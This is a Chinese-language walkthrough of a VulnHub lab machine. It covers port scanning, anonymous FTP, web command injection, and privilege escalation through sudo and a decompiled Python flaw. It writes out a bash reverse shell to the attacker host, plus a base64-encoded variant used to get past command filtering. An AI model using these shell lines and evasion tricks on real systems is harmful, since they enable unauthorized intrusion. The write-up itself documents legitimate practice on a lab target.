无聊,下个靶机来玩一下。
靶机下载地址:vulnhub官网
下载下来之后,我这边用的是virtualbox,kali攻击机与靶机都设置为net网络。
第一步,靶机扫描,这里打开靶机就能看到 ,靶机地址为10.0.2.43,这一步探测靶机地址可以不做,这里我的kali地址为10.0.2.4
第二步,靶机端口扫描
直接nmap扫描,具体命令就是nmap -sS -p 1-65535 10.0.2.43
第三步,信息的搜集。先进入ftp查看有什么文件线索,这里用anonymous(匿名)方式登录,可以看到三个文件
三个文件都下载下来查看一下
第一个文件感觉没什么用,ssh没有打开,无法验证第一个账户正确性,第二个文件提示我们,在1337号端口有个小游戏,这里直接进入1337端口,发现无法打开,这种情况我还是第一次遇见,之间发现打不开的情况都是要绑定ip与域名,查看大佬的博客发现,1337端口不能用浏览器直接访问,可以用kali的nc命令访问
打开发现需要回答1000次数学计算问题,其实这里我在想能否写个脚本实现自动回答问题,但是本人的python语言掌握有限,写不出来。
所以接着访问另外一个7331端口
这里查看源代码没什么信息,考虑用gobuster扫描网站目录
这里扫描目录时间挺长的,但是有用的也就wish目录,进入wish
直接输入id,查看返回的内容
这里直接bash reverse shell,bash -i >& /dev/tcp/10.0.2.4/4446 0>&1,后台监听,发现没有返回的shell,考虑可能是这条命令被禁止了。做到这就没什么思路了,看了大佬的博客,发现可以base64加密反弹shell,然后执行,加密后为echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjIuNC80NDQ2IDA+JjE= | base64 -d | bash,这里直接后台监听即可得到shell
在当前的目录下发现信息
直接到home的nitish目录里查看文件
这里直接su切换用户,发现出现了问题
搜了下发现是因为没有tty shell环境
输入这个生成ttyshell,python3 -c "import pty;pty.spawn('/bin/bash')"
然后切换用户即可,切换之后得到第一个flag
sudo -l查看权限
直接执行这个genie,发现
这里看大佬的操作输入man genie之后会出现cmd的参数介绍,但是我输入之后发现没有返回这个参数,只能直接用这个参数了,直接sudo -u sam genie -cmd id,就可以打开sam的终端
搜集下信息,
这里有个pyc的编译后的文件,在靶机上用python开启http服务,然后下载到本地,网上搜索反编译网站,我这里用的是这个,反编译如下
可以看到s==num哪里存在漏洞,这要在次输入sum即可。
sudo -l查看sam的权限
直接执行,sudo /root/lago
这个程序正好对应上面的反编译出的文件,直接输入2,然后再输入num即可提权到root
这里直接执行root目录下的文件,即可得到flag
到这里就完成了